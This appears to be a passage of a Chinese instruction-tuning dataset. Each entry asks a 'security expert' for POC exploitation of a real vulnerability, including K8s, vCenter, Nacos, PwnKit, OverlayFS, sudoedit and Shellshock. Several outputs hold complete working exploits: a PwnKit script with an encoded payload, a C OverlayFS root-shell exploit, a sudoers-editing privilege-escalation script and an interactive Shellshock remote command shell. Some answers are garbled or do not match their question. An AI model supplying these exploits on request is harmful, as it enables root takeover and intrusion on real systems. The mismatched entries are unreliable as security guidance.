  496. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:K8s etcd未授权访问\n漏洞描述:etcd 是云原生架构中重要的基础组件。etcd 在微服务和 Kubernates 集群中不仅可以作为服务注册于发现,还可以作为 key-value 存储的中间件,为 k8s 集群提供底层数据存储,保存了整个集群的状态。 在 K8s 集群初始化后,etcd 默认就以 pod 的形式存在,可以执行如下命令进行查看,etcd 组件监听的端口为 2379,并且对外开放。 ``` kubectl get pods -A | grep etcd ``` 在 etcd 的配置文件 /etc/kubernetes/manifests/etcd.yaml 中,--client-cert-auth 默认为 true,这意味着访问 etcd 服务需要携带 cert 进行认证。 如果目标在启动 etcd 的时候没有开启证书认证选项,且 2379 端口直接对外开放的话,则存在 etcd 未授权访问漏洞。 etcdctl 下载地址:https://github.com/etcd-io/etcd\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【POC利用方法】\n1. kubectl get pods -A | grep etcd\n2. https://your-ip:2379/version\n-------------\n返回如下则存在未授权访问:\n{etcdserver: \"3.4.3\", etcdcluster: \"3.4.0\"}\n3. https://your-ip:2379/v2/keys\n-------------\n返回如下则存在未授权访问:\n{\"action\":\"get\",\"node\":{\"dir\":true,\"nodes\":...}}\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/K8s etcd未授权访问.md"}
    497. 

  497. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972\n漏洞描述:由于对 vSphere vCenter Server中用户提供的输入的验证不足,因此存在该漏洞。远程非身份验证攻击者可以向端口 443/tcp 发送专门制作的 HTTP 请求,并在系统上执行任意代码。 参考链接: - https://blog.noah.360.net/vcenter-6-5-7-0-rce-lou-dong-fen-xi/ - https://swarm.ptsecurity.com/unauth-rce-vmware/ - https://www.vmware.com/security/advisories/VMSA-2021-0002.html\n影响版本:``` VMware vCenter Server 7.0系列 < 7.0.U1c VMware vCenter Server 6.7系列 < 6.7.U3l VMware vCenter Server 6.5系列 < 6.5 U3n ```\n网络测绘:``` app=\"vmware-vCenter\" ```\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【CVE编号】CVE-2021-21972\n【POC利用方法】\n1. VMware vCenter Server 7.0系列 < 7.0.U1c\nVMware vCenter Server 6.7系列 < 6.7.U3l\nVMware vCenter Server 6.5系列 < 6.5 U3n\n2. app=\"vmware-vCenter\"\n3. https://target/ui/vropspluginui/rest/services/uploadova\nPOST: name=\"uploadFile\"; filename=\"xxx.tar\"\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/VMware vCenter Server 远程代码执行漏洞 CVE-2021-21972.md"}
    498. 

  498. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nacos 集群 Raft 反序列化漏洞 CNVD-2023-45001\n漏洞描述:该漏洞源于 Nacos 集群处理部分 Jraft 请求时,未限制使用 hessian 进行反 。序列化,攻击者可以通过发送特制的请求触发该漏洞,最终执行任意远程代码。\n影响版本:``` 1.4.0 <= Nacos < 1.4.6 2.0.0 <= Nacos < 2.2.3 ```\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【POC利用方法】\n1. 1.4.0 <= Nacos < 1.4.6\n2.0.0 <= Nacos < 2.2.3\n2. exp:https://github.com/c0olw/NacosRce/\n3. 1. 默认配置下该漏洞仅影响 Nacos 集群间 Raft 协议通信的 7848 端口,此端口不承载客户端请求,可以通过限制集群外部 IP 访问 7848 端口来进行缓解。\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/Nacos 集群 Raft 反序列化漏洞 CNVD-2023-45001.md"}
    499. 

  499. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Nacos 未授权访问漏洞\n漏洞描述:2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞 。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。\n影响版本:``` Nacos <= 2.0.0-ALPHA.1 ```\n网络测绘:``` title=\"Nacos\" ```\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【POC利用方法】\n1. Nacos <= 2.0.0-ALPHA.1\n2. title=\"Nacos\"\n3. wget https://github.com/alibaba/nacos/releases/tag/2.0.0-ALPHA.1\ntar -zxvf nacos-server-2.0.0-ALPHA.1.tar.gz\n./startup.sh -m standalone\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/Nacos 未授权访问漏洞.md"}
    500. 

  500. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973\n漏洞描述:VMware vCenter Server 插件中对用户提供的输入验证不当,未经过身份验证的远程攻击者可以发送特制的 HTTP 请求,欺骗应用程序向任意系统发起请求。 参考链接: * https://kb.vmware.com/s/article/82374 * https://twitter.com/osama_hroot/status/1365586206982082560\n影响版本:``` vCenter Server: 6.5, 6.5 U1, 6.5 U3, 6.5.0, 6.5.0a, 6.5.0b, 6.5.0c, 6.5.0d, 6.5u2c, 6.7, 6.7 U3, 6.7.0, 6.7.0d, 6.7u3f, 7.0 Cloud Foundation: before 3.10.1.2, 4.2 ```\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【CVE编号】CVE-2021-21973\n【POC利用方法】\n1. vCenter Server: 6.5, 6.5 U1, 6.5 U3, 6.5.0, 6.5.0a, 6.5.0b, 6.5.0c, 6.5.0d, 6.5u2c, 6.7, 6.7 U3, 6.7.0, 6.7.0d, 6.7u3f, 7.0\nCloud Foundation: before 3.10.1.2, 4.2\n2. GET /ui/vropspluginui/rest/services/getvcdetails HTTP/1.1\nHOST:\nvcIP: SSRF\nvcUsername:sa\nvaPassword:sa\nreqResource:sa\n...\n3. * https://twitter.com/osama_hroot/status/1365586206982082560\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/VMware vCenter Server 服务器端请求伪造漏洞 CVE-2021-21973.md"}
    501. 

  501. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:K8s API Server未授权命令执行\n漏洞描述:Kubernetes是一个可以移植、可扩展的开源平台,使用 声明式的配置 并依据配置信息自动地执行容器化应用程序的管理。在所有的容器编排工具中(类似的还有 docker swarm / mesos等),Kubernetes的生态系统更大、增长更快,有更多的支持、服务和工具可供用户选择。 K8s 的API Server默认服务端口为8080(insecure-port)和6443(secure-port),8080端口提供HTTP服务,没有认证授权机制,而6443端口提供HTTPS服务,支持认证(使用令牌或客户端证书进行认证)和授权服务。默认情况下8080端口不启动,而6443端口启动。这两个端口的开放取决于/etc/kubernetes/manifests/kube-apiserver.yaml配置文件。 如果目标K8s的8080端口开启了,由于其没有认证授权机制,因此存在未授权访问。 如果目标K8s的6443端口开启了,如果配置错误,也可以导致存在未授权访问。\n", "input": "", "output": "【漏洞类型】cloud_security_vulnerability\n【POC利用方法】\n1. cd /etc/kubernetes/manifests\nvim kube-apiserver.yaml\n2. - --insecure-port=8080\n- --insecure-bind-address=0.0.0.0\n3. systemctl restart kubectl\n", "category": "poc_cloud_security_vulnerability", "source": "awesome_poc_dataset", "file_path": "云安全漏洞/K8s API Server未授权命令执行.md"}
    502. 

  502. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux eBPF 权限提升漏洞 CVE-2022-23222\n漏洞描述:Linux Kernel 是美国 Linux 基金会发布的开源操作系统 Linux 所使用的内核。Linux 内核是一种开源的类Unix 操作系统宏内核。整个 Linux 操作系统家族基于该内核部署在传统计算机平台(如个人计算机和服务器)。该漏洞是由于 Linux 内核的 BPF 验证器存在一个空指针漏洞,没有对 *_OR_NULL 指针类型进行限制,允许这些类型进行指针运算。攻击者可利用该漏洞在获得低权限的情况下,构造恶意数据执行空指针引用攻击,最终获取服务器 root 权限\n影响版本:``` Linux 5.8 - 5.16(在5.10.92 / 5.15.15 / 5.16.1中修复) ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2022-23222\n【POC利用方法】\n1. Linux 5.8 - 5.16(在5.10.92 / 5.15.15 / 5.16.1中修复)\n2. $ make\ncc -I include -static -w -o exploit exploit.c\n$ ./exploit \n[*] phase(1/8) 'create bpf map(s)' running\n[+] phase(1/8) 'create bpf map(s)' done\n[*] phase(2/8) 'do some leak' running\n[+] phase(2/8) 'do some leak' done\n[*] phase(3/8) 'prepare arbitrary rw' running\n[+] phase(3/8) 'prepare arbitrary rw' done\n[*] phase(4/8) 'spawn processes' running\n[+] phase(4/8) 'spawn processes' done\n[*] phase(5/8) 'find cred (slow)' running\n[+] phase(5/8) 'find cred (slow)' done\n[*] phase(6/8) 'overwrite cred' running\n[+] phase(6/8) 'overwrite cred' done\n[*] phase(7/8) 'spawn root shell' running\n[+] Enjoy root!\n# id\nuid=0(root) gid=0(root) groups=65534(nobody)\n# exit\n[+] phase(7/8) 'spawn root shell' done\n[*] phase(8/8) 'clean up the mess' running\n[+] phase(8/8) 'clean up the mess' done\n3. [*] phase(1/8) 'create bpf map(s)' running\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux eBPF 权限提升漏洞 CVE-2022-23222.md"}
    503. 

  503. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux Polkit 权限提升漏洞 CVE-2021-4034\n漏洞描述:Qualys 研究团队在 polkit 的 pkexec 中发现了一个内存损坏漏洞,该 SUID 根程序默认安装在每个主要的 Linux 发行版上。这个易于利用的漏洞允许任何非特权用户通过在其默认配置中利用此漏洞来获得易受攻击主机上的完全 root 权限。\n影响版本:``` Polkit > 2009 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2021-4034\n【POC利用方法】\n1. Polkit > 2009\n2. #!/usr/bin/env python3\n\n# poc for https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt found by qualys\n# hardcoded amd64 lib\nfrom ctypes import *\nfrom ctypes.util import find_library\nimport os\nimport zlib\nimport base64\nimport tempfile\n\npayload = zlib.decompress(\n    base64.b64decode(\n        \"\"\"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\"\"\"\n    )\n)\nlibc = CDLL(find_library(\"c\"))\nlibc.execve.argtypes = c_char_p, POINTER(c_char_p), POINTER(c_char_p)\nlibc.execve.restype = c_ssize_t\n\nwd = tempfile.mkdtemp()\nopen(wd + \"/pwn.so\", \"wb\").write(payload)\nos.mkdir(wd + \"/gconv/\")\nopen(wd + \"/gconv/gconv-modules\", \"w\").write(\n    \"module  UTF-8//    INTERNAL    ../pwn    2\"\n)\nos.mkdir(wd + \"/GCONV_PATH=.\")\nos.mknod(wd + \"/GCONV_PATH=./gconv\")\nos.chmod(wd + \"/GCONV_PATH=.\", 0o777)\nos.chmod(wd + \"/GCONV_PATH=./gconv\", 0o777)\nos.chmod(wd + \"/pwn.so\", 0o777)\nos.chdir(wd)\ncmd = b\"/usr/bin/pkexec\"\nargv = []\nenvp = [\n    b\"gconv\",\n    b\"PATH=GCONV_PATH=.\",\n    b\"LC_MESSAGES=en_US.UTF-8\",\n    b\"XAUTHORITY=../gconv\",\n    b\"\",\n]\n\ncargv = (c_char_p * (len(argv) + 1))(*argv, None)\ncenv = (c_char_p * (len(envp) + 1))(*envp, None)\nlibc.execve(cmd, cargv, cenv)\n3. wd = tempfile.mkdtemp()\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux Polkit 权限提升漏洞 CVE-2021-4034.md"}
    504. 

  504. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux kernel权限提升漏洞 CVE-2021-3493\n漏洞描述:Ubuntu OverlayFS Local Privesc CVE-2021-3493 EXP在Github被公开,可以通过EXP在Ubuntu多个影响系统中提升 ROOT权限\n影响版本:``` Ubuntu 20.10 Ubuntu 20.04 LTS Ubuntu 18.04 LTS Ubuntu 16.04 LTS Ubuntu 14.04 ESM ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2021-3493\n【POC利用方法】\n1. Ubuntu 20.10\nUbuntu 20.04 LTS\nUbuntu 18.04 LTS\nUbuntu 16.04 LTS\nUbuntu 14.04 ESM\n2. gcc exploit.c -o exploit\nchmod +x exploit\n./exploit\n3. #define _GNU_SOURCE\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <unistd.h>\n#include <fcntl.h>\n#include <err.h>\n#include <errno.h>\n#include <sched.h>\n#include <sys/types.h>\n#include <sys/stat.h>\n#include <sys/wait.h>\n#include <sys/mount.h>\n\n//#include <attr/xattr.h>\n//#include <sys/xattr.h>\nint setxattr(const char *path, const char *name, const void *value, size_t size, int flags);\n\n\n#define DIR_BASE    \"./ovlcap\"\n#define DIR_WORK    DIR_BASE \"/work\"\n#define DIR_LOWER   DIR_BASE \"/lower\"\n#define DIR_UPPER   DIR_BASE \"/upper\"\n#define DIR_MERGE   DIR_BASE \"/merge\"\n#define BIN_MERGE   DIR_MERGE \"/magic\"\n#define BIN_UPPER   DIR_UPPER \"/magic\"\n\n\nstatic void xmkdir(const char *path, mode_t mode)\n{\n    if (mkdir(path, mode) == -1 && errno != EEXIST)\n        err(1, \"mkdir %s\", path);\n}\n\nstatic void xwritefile(const char *path, const char *data)\n{\n    int fd = open(path, O_WRONLY);\n    if (fd == -1)\n        err(1, \"open %s\", path);\n    ssize_t len = (ssize_t) strlen(data);\n    if (write(fd, data, len) != len)\n        err(1, \"write %s\", path);\n    close(fd);\n}\n\nstatic void xcopyfile(const char *src, const char *dst, mode_t mode)\n{\n    int fi, fo;\n\n    if ((fi = open(src, O_RDONLY)) == -1)\n        err(1, \"open %s\", src);\n    if ((fo = open(dst, O_WRONLY | O_CREAT, mode)) == -1)\n        err(1, \"open %s\", dst);\n\n    char buf[4096];\n    ssize_t rd, wr;\n\n    for (;;) {\n        rd = read(fi, buf, sizeof(buf));\n        if (rd == 0) {\n            break;\n        } else if (rd == -1) {\n            if (errno == EINTR)\n                continue;\n            err(1, \"read %s\", src);\n        }\n\n        char *p = buf;\n        while (rd > 0) {\n            wr = write(fo, p, rd);\n            if (wr == -1) {\n                if (errno == EINTR)\n                    continue;\n                err(1, \"write %s\", dst);\n            }\n            p += wr;\n            rd -= wr;\n        }\n    }\n\n    close(fi);\n    close(fo);\n}\n\nstatic int exploit()\n{\n    char buf[4096];\n\n    sprintf(buf, \"rm -rf '%s/'\", DIR_BASE);\n    system(buf);\n\n    xmkdir(DIR_BASE, 0777);\n    xmkdir(DIR_WORK,  0777);\n    xmkdir(DIR_LOWER, 0777);\n    xmkdir(DIR_UPPER, 0777);\n    xmkdir(DIR_MERGE, 0777);\n\n    uid_t uid = getuid();\n    gid_t gid = getgid();\n\n    if (unshare(CLONE_NEWNS | CLONE_NEWUSER) == -1)\n        err(1, \"unshare\");\n\n    xwritefile(\"/proc/self/setgroups\", \"deny\");\n\n    sprintf(buf, \"0 %d 1\", uid);\n    xwritefile(\"/proc/self/uid_map\", buf);\n\n    sprintf(buf, \"0 %d 1\", gid);\n    xwritefile(\"/proc/self/gid_map\", buf);\n\n    sprintf(buf, \"lowerdir=%s,upperdir=%s,workdir=%s\", DIR_LOWER, DIR_UPPER, DIR_WORK);\n    if (mount(\"overlay\", DIR_MERGE, \"overlay\", 0, buf) == -1)\n        err(1, \"mount %s\", DIR_MERGE);\n\n    // all+ep\n    char cap[] = \"\\x01\\x00\\x00\\x02\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\\xff\\xff\\xff\\xff\\x00\\x00\\x00\\x00\";\n\n    xcopyfile(\"/proc/self/exe\", BIN_MERGE, 0777);\n    if (setxattr(BIN_MERGE, \"security.capability\", cap, sizeof(cap) - 1, 0) == -1)\n        err(1, \"setxattr %s\", BIN_MERGE);\n\n    return 0;\n}\n\nint main(int argc, char *argv[])\n{\n    if (strstr(argv[0], \"magic\") || (argc > 1 && !strcmp(argv[1], \"shell\"))) {\n        setuid(0);\n        setgid(0);\n        execl(\"/bin/bash\", \"/bin/bash\", \"--norc\", \"--noprofile\", \"-i\", NULL);\n        err(1, \"execl /bin/bash\");\n    }\n\n    pid_t child = fork();\n    if (child == -1)\n        err(1, \"fork\");\n\n    if (child == 0) {\n        _exit(exploit());\n    } else {\n        waitpid(child, NULL, 0);\n    }\n\n    execl(BIN_UPPER, BIN_UPPER, \"shell\", NULL);\n    err(1, \"execl %s\", BIN_UPPER);\n}\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux kernel权限提升漏洞 CVE-2021-3493.md"}
    505. 

  505. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Windows CryptoAPI 欺骗漏洞 CVE-2020-0601\n漏洞描述:1月15日,微软发布了针对CVE-2020-0601的安全补丁,该漏洞是微软在实现椭圆曲线加密算法数字证书验证时产生,可被利用于伪造来自可信任来源的签名或证书,并且因其业务特性会衍生出多种攻击向量,具有极高的可利用价值和极大的潜在破坏力,Win 10和windows server 2016 & 2019也都在其影响范围内。该漏洞由美国NSA国家安全局发现后汇报给微软公司,也被认为是第一个NSA公开披露的软件系统漏洞,当然也有可能存在其特殊的战术目的。绿盟科技M01N攻击安全研究团队对此漏洞原理进行了详细分析并复现了多种可能的攻击方法,提出了详细的检测及整改方案。 参考阅读: - [cve-2020-0601-windows-cryptoapi欺骗漏洞分析](http://blog.nsfocus.net/cve-2020-0601-windows-cryptoapi欺骗漏洞分析/)\n影响版本:``` 带有指定参数的ECC密钥的证书的Microsoft Windows版本 依赖于Windows CryptoAPI的应用程序 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2020-0601\n【POC利用方法】\n1. 带有指定参数的ECC密钥的证书的Microsoft Windows版本\n依赖于Windows CryptoAPI的应用程序\n2. require 'openssl'\n\nraw = File.read ARGV[0]     # 读取使用ECC算法的证书文件\nca = OpenSSL::X509::Certificate.new(raw)    # 读取使用ECC算法的证书\nca_key = ca.public_key  # 从证书中提取公钥ca_key\n\nca_key.private_key = 1  # 设置私钥为1,使得公钥K==1*基点G的等式成立\ngroup = ca_key.group \ngroup.set_generator(ca_key.public_key, group.order, group.cofactor)\ngroup.asn1_flag = OpenSSL::PKey::EC::EXPLICIT_CURVE\nca_key.group = group        # 利用构建的假基点G和假密钥k设置新group\nFile.open(\"spoofed_ca.key\", 'w') { |f| f.write ca_key.to_pem }  # 将新的group写入文件\n3. 虽然椭圆曲线加密算法具有着许多优势,纯算法角度破解难度极大,微软对此算法的实现的缺漏却给漏洞利用提供了可乘之机。回到椭圆曲线加密最基本的等式 K=kG,首先需要明确的是,虽然对于给定的基点G和公钥K,要求解私钥k很困难,但是如果可以任意指定基点G,要构造一对k和G使等式成立却极其简单;最简单的情况,令基点G=K,则私钥k=1,这样一对基点和私钥可以使等式成立,也是有效的解。\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Windows CryptoAPI 欺骗漏洞 CVE-2020-0601.md"}
    506. 

  506. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux Sudo 权限提升漏洞 CVE-2023-22809\n漏洞描述:Sudo 存在权限提升漏洞,攻击者可过特定的 payload 获取服务器 root 权限。 Sudo 中的 sudoedit 对处理用户提供的环境变量(如`SUDO_EDITOR`、`VISUAL`和`EDITOR`)中传递的额外参数存在缺陷。当用户指定的编辑器包含绕过 sudoers 策略的 \" –\" 参数时,拥有sudoedit 访问权限的本地攻击者可通过将任意条目附加到要处理的文件列表中,最终在目标系统上实现权限提升。该漏洞还影响部分 QNAP 操作系统:QTS、QuTS hero、QuTScloud、QVP(QVR Pro 设备)。\n影响版本:``` Sudo: 1.8.0~1.9.12p1 均受影响 QTS 与 QuTS hero: QTS < 5.0.1.2346 build 20230322 QuTS < hero h5.0.1.2348 build 20230324 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2023-22809\n【POC利用方法】\n1. Sudo:\n1.8.0~1.9.12p1 均受影响\n\nQTS 与 QuTS hero:\nQTS < 5.0.1.2346 build 20230322\nQuTS < hero h5.0.1.2348 build 20230324\n2. #!/usr/bin/env bash\n#\n# Exploit Title: sudo 1.8.0 - 1.9.12p1 - Privilege Escalation\n# \n# Exploit Author: n3m1.sys\n# CVE: CVE-2023-22809\n# Date: 2023/01/21\n# Vendor Homepage: https://www.sudo.ws/\n# Software Link: https://www.sudo.ws/dist/sudo-1.9.12p1.tar.gz\n# Version: 1.8.0 to 1.9.12p1\n# Tested on: Ubuntu Server 22.04 - vim 8.2.4919 - sudo 1.9.9\n#\n# Running this exploit on a vulnerable system allows a localiattacker to gain \n# a root shell on the machine.\n#\n# The exploit checks if the current user has privileges to run sudoedit or \n# sudo -e on a file as root. If so it will open the sudoers file for the\n# attacker to add a line to gain privileges on all the files and get a root \n# shell.\n\nif ! sudo --version | head -1 | grep -qE '(1\\.8.*|1\\.9\\.[0-9]1?(p[1-3])?|1\\.9\\.12p1)$'\nthen\n    echo \"> Currently installed sudo version is not vulnerable\"\n    exit 1\nfi\n\nEXPLOITABLE=$(sudo -l | grep -E \"sudoedit|sudo -e\" | grep -E '\\(root\\)|\\(ALL\\)|\\(ALL : ALL\\)' | cut -d ')' -f 2-)\n\nif [ -z \"$EXPLOITABLE\" ]; then\n    echo \"> It doesn't seem that this user can run sudoedit as root\"\n    read -p \"Do you want to proceed anyway? (y/N): \" confirm && [[ $confirm == [yY] ]] || exit 2\nelse\n    echo \"> BINGO! User exploitable\"\nfi\n\necho \"> Opening sudoers file, please add the following line to the file in order to do the privesc:\"\necho \"$USER ALL=(ALL:ALL) ALL\"\nread -n 1 -s -r -p \"Press any key to continue...\"\nEDITOR=\"vim -- /etc/sudoers\" $EXPLOITABLE\nsudo su root\nexit 0\n3. Defaults!SUDOEDIT env_delete+=\"SUDO_EDITOR VISUAL EDITOR\"\nCmnd_Alias SUDOEDIT = sudoedit /etc/custom/service.conf\nuser ALL=(ALL:ALL) SUDOEDIT\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux sudo 权限提升漏洞 CVE-2023-22809.md"}
    507. 

  507. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Shellshock 破壳漏洞 CVE-2014-6271\n漏洞描述:bash使用的环境变量是通过函数名称来调用的,导致漏洞出问题是以“(){”开头定义的环境变量在命令ENV中解析成函数后,Bash执行并未退出,而是继续解析并执行shell命令。核心的原因在于在输入的过滤中没有严格限制边界,没有做合法化的参数判断。 此前已验证Red Hat、 CentOS 、Ubuntu 、Fedora 、Amazon Linux 、OS X 10.10均拥有存在CVE-2014-6271漏洞的bash版本,以bash在各主流操作系统的广泛应用,此漏洞的影响范围包括但不限于大多数应用bash的Unix、Linux、Mac OS X,针对这些操作系统管理下的数据存在高危威胁。\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2014-6271\n【POC利用方法】\n1. docker-compose up -d\n2. User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id\n3. #!/usr/bin/python\n\n# Successful Output:\n# # python shell_shocker.py <VulnURL>\n# [+] Attempting Shell_Shock - Make sure to type full path\n# ~$ /bin/ls /\n# bin\n# boot\n# dev\n# etc\n# ..\n# ~$ /bin/cat /etc/passwd\n\nfrom __future__ import print_function\nfrom future import standard_library\nstandard_library.install_aliases()\nfrom builtins import input\nimport sys, urllib.request, urllib.error, urllib.parse\n\nif len(sys.argv) != 2:\n        print(\"Usage: shell_shocker <URL>\")\n        sys.exit(0)\n\nURL=sys.argv[1]\nprint(\"[+] Attempting Shell_Shock - Make sure to type full path\")\n\nwhile True:\n        command=input(\"~$ \")\n        opener=urllib.request.build_opener()\n        opener.addheaders=[('User-agent', '() { foo;}; echo Content-Type: text/plain ; echo ; '+command)]\n        try:\n                response=opener.open(URL)\n                for line in response.readlines():\n                        print(line.strip())\n        except Exception as e: print(e)\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Shellshock 破壳漏洞 CVE-2014-6271.md"}
    508. 

  508. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Linux openvswitch权限提升漏洞 CVE-2022-2639\n漏洞描述:由于 openvswitch 模块在处理大量actions的情况下,可能存在越界写入漏洞,本地经过身份认证的攻击者可利用此漏洞获取root权限\n影响版本:``` 3.13 ≤ Linux Kernel < 5.18 ```\n", "input": "", "output": "【漏洞类型】os_vulnerability\n【CVE编号】CVE-2022-2639\n【POC利用方法】\n1. 3.13 ≤ Linux Kernel < 5.18\n2. 编译POC并运行获取Root权限\n3. https://github.com/avboy1337/CVE-2022-2639-PipeVersion\n", "category": "poc_os_vulnerability", "source": "awesome_poc_dataset", "file_path": "操作系统漏洞/Linux openvswitch权限提升漏洞 CVE-2022-2639.md"}
    509. 

